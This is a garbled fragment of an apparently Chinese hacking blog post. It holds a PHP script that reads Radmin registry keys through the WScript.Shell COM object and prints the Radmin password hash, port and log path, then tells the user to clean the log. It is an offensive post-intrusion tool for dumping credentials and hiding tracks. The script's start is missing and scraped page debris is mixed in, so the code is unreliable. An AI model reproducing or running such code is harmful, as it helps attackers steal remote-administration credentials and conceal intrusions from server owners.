应小猪大锅的要求写的一个脚本。很垃圾但是还算有用吧。
regread($rootkey.$parameter);
$myport = $shell->regread($rootkey.$port);
$path = $shell->regread($rootkey.$logpath);
echo radmin hash is:;
foreach($myparam as $a){
echo dechex($a);
}
echo
;
echo radmin port is :.hexdec(dechex($myport[1]).dechex($myport[0])).
;
echo radmin log path is:$path
;
echo please clean the log
?>
http://www.bkjia.com/phpjc/508458.htmlwww.bkjia.comtruehttp://www.bkjia.com/phpjc/508458.htmltecharticle孤水绕城’s blog 应小猪大锅的要求写的一个脚本。很垃圾但是还算有用吧。 ?php $shell = new com(wscript.shell) or die(this thing requires windows scri...
